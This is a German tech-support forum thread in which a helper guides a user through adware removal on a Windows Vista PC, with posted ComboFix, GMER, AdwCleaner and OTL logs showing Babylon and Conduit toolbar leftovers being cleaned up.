"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-11-06 178712]

"Persistence"="c:\windows\system32\igfxpers.exe" [2008-11-06 154136]

"WirelessAssistant"="c:\program files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe" [2009-09-01 499768]

"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2010-06-04 1791272]

"HP Software Update"="c:\program files\Hp\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]

"SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2008-12-11 1310720]

"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-12-03 946352]

"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2012-08-08 348664]

"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-10-11 59280]

"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-06-07 421776]

"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2012-10-25 421888]

.

c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\

Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588]

Mozilla Thunderbird.lnk - c:\program files\Mozilla Thunderbird\thunderbird.exe [2013-1-9 389168]

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]

"EnableUIADesktopToggle"= 0 (0x0)

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]

"aux"=wdmaud.drv

.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]

@="Service"

.

--- Andere Dienste/Treiber im Speicher ---

.

*NewlyCreated* - ECACHE

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]

LocalServiceNoNetwork        REG_MULTI_SZ           PLA DPS BFE mpssvc

bthsvcs        REG_MULTI_SZ           BthServ

LocalServiceAndNoImpersonation        REG_MULTI_SZ           FontCache

.

Inhalt des "geplante Tasks" Ordners

.

2013-02-19 c:\windows\Tasks\Adobe Flash Player Updater.job

- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-06-10 15:58]

.

.

------- Zusätzlicher Suchlauf -------

.

mStart Page = about:blank

uInternet Settings,ProxyOverride = *.local

TCP: DhcpNameServer = 192.168.2.1

FF - ProfilePath - c:\users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\

FF - prefs.js: browser.startup.homepage - hxxp://www.google.de/

FF - ExtSQL: 2013-02-12 13:59; FirefoxToolbar@gutscheindoktor.de; c:\users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi

FF - ExtSQL: !HIDDEN! 2011-02-20 13:50; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension

FF - user.js: extensions.BabylonToolbar.tlbrSrchUrl - hxxp://search.babylon.com/?babsrc=TB_def&mntrId=5fb987f200000000000000ffbeb5fb91&q=

FF - user.js: extensions.BabylonToolbar.id - 5fb987f200000000000000ffbeb5fb91

FF - user.js: extensions.BabylonToolbar.appId - {BDB69379-802F-4eaf-B541-F8DE92DD98DB}

FF - user.js: extensions.BabylonToolbar.instlDay - 15674

FF - user.js: extensions.BabylonToolbar.vrsn - 1.8.3.8

FF - user.js: extensions.BabylonToolbar.vrsni - 1.8.3.8

FF - user.js: extensions.BabylonToolbar_i.vrsnTs - 1.8.3.814:56

FF - user.js: extensions.BabylonToolbar.prtnrId - babylon

FF - user.js: extensions.BabylonToolbar.prdct - BabylonToolbar

FF - user.js: extensions.BabylonToolbar.aflt - babsst

FF - user.js: extensions.BabylonToolbar_i.smplGrp - none

FF - user.js: extensions.BabylonToolbar.tlbrId - irhnew

FF - user.js: extensions.BabylonToolbar.instlRef - sst

FF - user.js: extensions.BabylonToolbar.dfltLng - en

FF - user.js: extensions.BabylonToolbar.excTlbr - false

FF - user.js: extensions.BabylonToolbar.admin - false

.

- - - - Entfernte verwaiste Registrierungseinträge - - - -

.

URLSearchHooks-{7e111a5c-3d11-4f56-9463-5310c3c69025} - (no file)

SafeBoot-WudfPf

SafeBoot-WudfRd

AddRemove-Agere Systems Soft Modem - c:\windows\agrsmdel

.

.

.

**************************************************************************

.

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net

Rootkit scan 2013-02-19 19:29

Windows 6.0.6002 Service Pack 2 NTFS

.

Scanne versteckte Prozesse... 

.

Scanne versteckte Autostarteinträge... 

.

Scanne versteckte Dateien... 

.

Scan erfolgreich abgeschlossen

versteckte Dateien: 0

.

**************************************************************************

.

--------------------- Gesperrte Registrierungsschluessel ---------------------

.

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]

@Denied: (A) (Users)

@Denied: (A) (Everyone)

@Allowed: (B 1 2 3 4 5) (S-1-5-20)

"BlindDial"=dword:00000000

"MSCurrentCountry"=dword:000000b5

.

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]

@Denied: (A) (Users)

@Denied: (A) (Everyone)

@Allowed: (B 1 2 3 4 5) (S-1-5-20)

"BlindDial"=dword:00000000

.

Zeit der Fertigstellung: 2013-02-19  19:31:47

ComboFix-quarantined-files.txt  2013-02-19 18:31

.

Vor Suchlauf: 10 Verzeichnis(se), 185.801.080.832 Bytes frei

Nach Suchlauf: 17 Verzeichnis(se), 185.690.263.552 Bytes frei

.

- - End Of File - - 444DFE3E87C0896BC43D3104E2BCE9D1

--- --- ---

Ebenfalls erledigt, Logfile hängt wieder an.

GMER Logfile:

Code:

GMER 2.1.18952 - hxxp://www.gmer.net

Rootkit scan 2013-02-19 19:58:12

Windows 6.0.6002 Service Pack 2 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0 Hitachi_HTS543225L9A300 rev.FBEOC44C 232,89GB

Running: GMER_2.1.18952.exe; Driver: C:\Users\TuS\AppData\Local\Temp\uwldipow.sys
 
 

---- System - GMER 2.1 ----
 

SSDT            8DF32396                                                                                                            ZwCreateSection

SSDT            8DF323A0                                                                                                            ZwRequestWaitReplyPort

SSDT            8DF3239B                                                                                                            ZwSetContextThread

SSDT            8DF323A5                                                                                                            ZwSetSecurityObject

SSDT            8DF323AA                                                                                                            ZwSystemDebugControl

SSDT            8DF32337                                                                                                            ZwTerminateProcess
 

---- Kernel code sections - GMER 2.1 ----
 

.text           ntkrnlpa.exe!KeSetEvent + 215                                                                                       828B88D8 4 Bytes  [96, 23, F3, 8D]

.text           ntkrnlpa.exe!KeSetEvent + 539                                                                                       828B8BFC 4 Bytes  [A0, 23, F3, 8D]

.text           ntkrnlpa.exe!KeSetEvent + 56D                                                                                       828B8C30 4 Bytes  [9B, 23, F3, 8D]

.text           ntkrnlpa.exe!KeSetEvent + 5D1                                                                                       828B8C94 4 Bytes  [A5, 23, F3, 8D]

.text           ntkrnlpa.exe!KeSetEvent + 619                                                                                       828B8CDC 4 Bytes  [AA, 23, F3, 8D]

.text           ...                                                                                                                 
 

---- Devices - GMER 2.1 ----
 

AttachedDevice  \Driver\kbdclass \Device\KeyboardClass0                                                                             Wdf01000.sys (Kernelmodustreiber-Frameworklaufzeit/Microsoft Corporation)

AttachedDevice  \FileSystem\fastfat \Fat                                                                                            fltmgr.sys (Microsoft Dateisystem-Filter-Manager/Microsoft Corporation)
 

---- Registry - GMER 2.1 ----
 

Reg             HKLM\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Keys\0021868ebca0                                         

Reg             HKLM\SYSTEM\ControlSet003\Services\BTHPORT\Parameters\Keys\0021868ebca0 (not active ControlSet)                     

Reg             HKLM\SOFTWARE\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32@cd042efbbd7f7af1647644e76e06692b  0xE2 0x63 0x26 0xF1 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32@bca643cdc5c2726b20d2ecedcc62c59b  0x71 0x3B 0x04 0x66 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32@2c81e34222e8052573023a60d06dd016  0xFF 0x7C 0x85 0xE0 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32@2582ae41fb52324423be06337561aa48  0x3E 0x1E 0x9E 0xE0 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32@caaeda5fd7a9ed7697d9686d4b818472  0xF5 0x1D 0x4D 0x73 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32@a4a1bcf2cc2b8bc3716b74b2b4522f5d  0xB0 0x18 0xED 0xA7 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32@4d370831d2c43cd13623e232fed27b7b  0x31 0x77 0xE1 0xBA ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32@1d68fe701cdea33e477eb204b76f993d  0xAA 0x52 0xC6 0x00 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32@1fac81b91d8e3c5aa4b0a51804d844a3  0x51 0xFA 0x6E 0x91 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32@f5f62a6129303efb32fbe080bb27835b  0xB1 0xCD 0x45 0x5A ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32@fd4e2e1a3940b94dceb5a6a021f2e3c6  0x2A 0xB7 0xCC 0xB5 ...

Reg             HKLM\SOFTWARE\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32                                   

Reg             HKLM\SOFTWARE\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32@ThreadingModel                    (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32@                                  (null)

Reg             HKLM\SOFTWARE\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32@8a8aec57dd6508a385616fbc86791ec2  0x6C 0x43 0x2D 0x1E ...
 

---- EOF - GMER 2.1 ----

--- --- ---

gut.
lade den CCleaner standard:
CCleaner - Download - Filepony
falls der CCleaner
bereits instaliert, überspringen.
öffnen, Tools (extras),uninstall Llist, als txt speichern. öffnen.
hinter, jedes von dir benötigte programm, schreibe notwendig.
hinter, jedes, von dir nicht benötigte, unnötig.
hinter, dir unbekannte, unbekannt.
liste posten.

Hier die Liste. Unnötige Programme lösche ich eigentlich regelmäßig, jetzt in der Liste sind lediglich zwie dabei.

Zitat:

7-Zip 9.20 09.06.2011 3,53MB notwendig
Adobe Flash Player 11 Plugin Adobe Systems Incorporated 08.02.2013 11.5.502.149 notwendig
Adobe Reader X (10.1.5) - Deutsch Adobe Systems Incorporated 19.02.2013 118MB 10.1.5 notwendig
Adobe Shockwave Player 11.6 Adobe Systems, Inc. 09.04.2012 10,0MB 11.6.4.634 notwendig
Apple Application Support Apple Inc. 24.01.2013 65,0MB 2.3 notwendig
Apple Mobile Device Support Apple Inc. 29.06.2012 24,4MB 5.2.0.6 notwenidg
Apple Software Update Apple Inc. 29.06.2012 2,38MB 2.1.3.127 notwendig
Avira Free Antivirus Avira 14.11.2012 173MB 12.1.9.1236 notwendig
Bonjour Apple Inc. 29.06.2012 1,02MB 3.0.0.10 unbekannt
Broadcom 802.11 Wireless LAN Adapter Broadcom Corporation 18.02.2011 5.60.18.12 unbekannt
BurnAware Free 5.2 Burnaware Technologies 21.10.2012 24,5MB notwendig
CCleaner Piriform 23.01.2013 5,12MB 3.27 notwendig
Der Kleine Turnierplaner 7.1.4.1 Der Kleine Turnierplaner 20.06.2012 23,3MB 7.1.4.1 notwendig
DivX Codec DivX, Inc. 10.05.2012 1,65MB 6.6.1 notwendig
FileZilla Client 3.6.0.2 FileZilla Project 18.02.2013 17,5MB 3.6.0.2 notwendig
GIMP 2.6.11 The GIMP Team 09.06.2011 111MB 2.6.11 notwendig
HP Product Detection Hewlett-Packard Company 18.02.2011 1,90MB 10.7.9.0 notwendig
HP Update Hewlett-Packard 19.02.2011 3,71MB 4.000.010.008 notwendig
HP Wireless Assistant Hewlett-Packard 18.02.2011 3,93MB 3.50.10.1 notwenig
Intel(R) Graphics Media Accelerator Driver Intel Corporation 18.02.2011 notwendig
iTunes Apple Inc. 29.06.2012 183MB 10.6.3.25 notwendig
Java 7 Update 10 Oracle 22.12.2012 128MB 7.0.100 notwendig
LM98Free 2.2a 20.06.2012 1,30MB notwendig
Marvell Miniport Driver Marvell 18.02.2011 2,93MB 10.70.5.3 unbekannt
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU Microsoft Corporation 20.02.2011 36,9MB notwendig
Microsoft .NET Framework 3.5 SP1 Microsoft Corporation 19.02.2011 36,9MB notwendig
Microsoft .NET Framework 4 Client Profile Microsoft Corporation 08.03.2011 120MB 4.0.30319 notwendig
Microsoft .NET Framework 4 Client Profile DEU Language Pack Microsoft Corporation 08.03.2011 24,5MB 4.0.30319 notwendig
Microsoft Office 2000 Professional Microsoft Corporation 03.04.2012 197MB 9.00.2816 notwendig
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 10.05.2012 2,69MB 8.0.59193 notwendig
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 05.09.2012 233KB 9.0.30729 notwendig
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 11.10.2011 233KB 9.0.30729 notwendig
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 09.06.2011 590KB 9.0.30729.4148 notwendig
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 04.04.2012 11,1MB 10.0.40219 notwendig
Microsoft Visual J# 2.0 Redistributable Package - SE Microsoft Corporation 10.05.2012 92,2MB notwendig
Mozilla Firefox 18.0.2 (x86 de) Mozilla 08.02.2013 46,1MB 18.0.2 notwendig
Mozilla Maintenance Service Mozilla 08.02.2013 216KB 18.0.2 notwendig
Mozilla Thunderbird 17.0.2 (x86 de) Mozilla 09.01.2013 42,1MB 17.0.2 notwendig
Mp3tag v2.49 Florian Heidenreich 18.08.2011 6,91MB v2.49 notwendig
MSXML 4.0 SP2 (KB927978) Microsoft Corporation 31.08.2012 34,0KB 4.20.9841.0 unbekannt
MSXML 4.0 SP2 (KB954430) Microsoft Corporation 31.08.2012 35,0KB 4.20.9870.0 unbekannt
MSXML 4.0 SP2 (KB973688) Microsoft Corporation 31.08.2012 1,33MB 4.20.9876.0 unbekannt
MSXML 4.0 SP2 Parser and SDK Microsoft Corporation 10.05.2012 1,22MB 4.20.9818.0 unbekannt
Notepad++ 18.02.2013 12,6MB 6.3 notwendig
Nur Deinstallierung der CopyTrans Suite möglich. WindSolutions 18.08.2011 10,1MB 2.27 unnötig
OpenOffice.org 3.3 OpenOffice.org 09.06.2011 412MB 3.3.9567 notwendig
QuickTime Apple Inc. 24.01.2013 73,1MB 7.73.80.64 notwendig
RocketDock 1.3.5 Punk Software 01.07.2011 11,9MB notwendig
Skype™ 5.3 Skype Technologies S.A. 20.06.2011 16,6MB 5.3.120 notwendig
SoundMAX Analog Devices 18.02.2011 5,73MB 6.10.1.5880 unbekannt
Synaptics Pointing Device Driver Synaptics Incorporated 18.02.2011 32,9MB 15.0.24.0 unbekannt
TeamViewer 8 TeamViewer 05.01.2013 30,9MB 8.0.16642 unnötig
VLC media player 1.1.10 VideoLAN 09.06.2011 81,5MB 1.1.10 notwendig
XP Codec Pack 08.06.2012 4,86MB notwendig

deinstaliere:
Adobe Flash Player alle
Adobe - Adobe Flash Player installieren
neueste version laden, instalieren.
adobe reader:
Adobe - Adobe Reader herunterladen - Alle Versionen
haken bei mcafee security scan raus nehmen

bitte auch mal den adobe reader wie folgt konfigurieren:
adobe reader öffnen, bearbeiten, voreinstellungen.
allgemein:
nur zertifizierte zusatz module verwenden, anhaken.
Sicherheit (erweitert)
Erweiterte Sicherheit anhaken
und alle Dateien auswählen.
internet:
hier sollte alles deaktiviert werden, es ist sehr unsicher pdfs automatisch zu öffnen, zu downloaden etc.
es ist immer besser diese direkt abzuspeichern da man nur so die kontrolle hat was auf dem pc vor geht.
bei javascript den haken bei java script verwenden raus nehmen
bei updater, automatisch instalieren wählen.
übernehmen /ok

deinstaliere:
Java
downloade Java jre:
Java-Downloads für alle Betriebssysteme
klicke:
Download der Java-Software für Windows Offline
laden, und instalieren
deinstaliere:
TeamViewer

Öffne CCleaner analysieren starten, PC neustarten.

Downloade Dir bitte

AdwCleaner auf deinen Desktop.

Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
Starte die AdwCleaner.exe mit einem Doppelklick.
Stimme den Nutzungsbedingungen zu.
Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
- "Tracing" Schlüssel löschen
- Winsock Einstellungen zurücksetzen
- Proxy Einstellungen zurücksetzen
- Internet Explorer Richtlinien zurücksetzen
- Chrome Richtlinien zurücksetzen
- Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

So, das hat jetzt ein wenig gedauert aber ich hab alles erledigt. Hier die Logfile vom Adw Cleaner:

AdwCleaner Logfile:

Code:

# AdwCleaner v2.112 - Datei am 19/02/2013 um 20:54:15 erstellt

# Aktualisiert am 10/02/2013 von Xplode

# Betriebssystem : Windows Vista (TM) Home Basic Service Pack 2 (32 bits)

# Benutzer : TuS - TUS-PC

# Bootmodus : Normal

# Ausgeführt unter : C:\Users\TuS\Desktop\adwcleaner0.exe

# Option [Löschen]
 
 

**** [Dienste] ****
 
 

***** [Dateien / Ordner] *****
 

Ordner Gelöscht : C:\Program Files\Conduit

Ordner Gelöscht : C:\ProgramData\Babylon

Ordner Gelöscht : C:\Users\TuS\AppData\Local\Conduit

Ordner Gelöscht : C:\Users\TuS\AppData\LocalLow\Conduit

Ordner Gelöscht : C:\Users\TuS\AppData\LocalLow\PriceGong

Ordner Gelöscht : C:\Users\TuS\AppData\Roaming\Babylon
 

***** [Registrierungsdatenbank] *****
 

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Conduit

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\ConduitSearchScopes

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\PriceGong

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\SmartBar

Schlüssel Gelöscht : HKCU\Software\InstallCore

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{87EAB409-97D7-4889-ACFA-C548FC6F3ECF}

Schlüssel Gelöscht : HKLM\Software\Babylon

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{BDB69379-802F-4EAF-B541-F8DE92DD98DB}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Prod.cap

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Toolbar.CT1561552

Schlüssel Gelöscht : HKLM\Software\Conduit

Schlüssel Gelöscht : HKLM\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\063A857434EDED11A893800002C0A966
 

***** [Internet Browser] *****
 

-\\ Internet Explorer v9.0.8112.16464
 

[OK] Die Registrierungsdatenbank ist sauber.
 

-\\ Mozilla Firefox v18.0.2 (de)
 

Datei : C:\Users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\prefs.js
 

C:\Users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\user.js ... Gelöscht !
 

Gelöscht : user_pref("extensions.BabylonToolbar.admin", false);

Gelöscht : user_pref("extensions.BabylonToolbar.aflt", "babsst");

Gelöscht : user_pref("extensions.BabylonToolbar.appId", "{BDB69379-802F-4eaf-B541-F8DE92DD98DB}");

Gelöscht : user_pref("extensions.BabylonToolbar.dfltLng", "en");

Gelöscht : user_pref("extensions.BabylonToolbar.excTlbr", false);

Gelöscht : user_pref("extensions.BabylonToolbar.id", "5fb987f200000000000000ffbeb5fb91");

Gelöscht : user_pref("extensions.BabylonToolbar.instlDay", "15674");

Gelöscht : user_pref("extensions.BabylonToolbar.instlRef", "sst");

Gelöscht : user_pref("extensions.BabylonToolbar.prdct", "BabylonToolbar");

Gelöscht : user_pref("extensions.BabylonToolbar.prtnrId", "babylon");

Gelöscht : user_pref("extensions.BabylonToolbar.tlbrId", "irhnew");

Gelöscht : user_pref("extensions.BabylonToolbar.tlbrSrchUrl", "hxxp://search.babylon.com/?babsrc=TB_def&mntrId=[...]

Gelöscht : user_pref("extensions.BabylonToolbar.vrsn", "1.8.3.8");

Gelöscht : user_pref("extensions.BabylonToolbar.vrsni", "1.8.3.8");

Gelöscht : user_pref("extensions.BabylonToolbar_i.smplGrp", "none");

Gelöscht : user_pref("extensions.BabylonToolbar_i.vrsnTs", "1.8.3.814:56:24");
 

*************************
 

AdwCleaner[S2].txt - [3280 octets] - [19/02/2013 20:54:15]
 

########## EOF - C:\AdwCleaner[S2].txt - [3340 octets] ##########

--- --- ---

hi
HitmanPro - Download - Filepony
lade hitmanpro
doppelklicken, Lizenz, Testlizenz
dann auf Scan.
Nichts löschen.
Klicke weiter, log als xml exportieren und posten, bzw packen und anhängen

Da wurde wohl was gefunden. Gelöscht habe ich noch nichts. Log-File im Anhang!

ok, alle Funde löschen, neustarten. neues OTL log posten bitte

Ich nehme an mit denselben Daten wie beim ersten Mal? Hier ist die Logfile

OTL Logfile:

Code:

OTL logfile created on: 19.02.2013 21:32:49 - Run 2

OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop

Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation

Internet Explorer (Version = 9.0.8112.16421)

Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

 

1,93 Gb Total Physical Memory | 0,91 Gb Available Physical Memory | 46,92% Memory free

4,10 Gb Paging File | 2,98 Gb Available in Paging File | 72,77% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

 

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 222,88 Gb Total Space | 170,40 Gb Free Space | 76,45% Space Free | Partition Type: NTFS

Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32

Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS

Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS

Drive H: | 465,65 Gb Total Space | 206,74 Gb Free Space | 44,40% Space Free | Partition Type: FAT32

 

Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: Current user | Quick Scan

Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

 
 ========== Processes (SafeList) ==========

 

PRC - [2013.02.19 21:21:36 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe

PRC - [2013.02.08 16:40:08 | 000,917,400 | ---- | M] (Mozilla Corporation) -- C:\Programme\Mozilla Firefox\firefox.exe

PRC - [2013.01.09 15:22:08 | 000,389,168 | ---- | M] (Mozilla Corporation) -- C:\Programme\Mozilla Thunderbird\thunderbird.exe

PRC - [2012.08.08 11:47:47 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avgnt.exe

PRC - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe

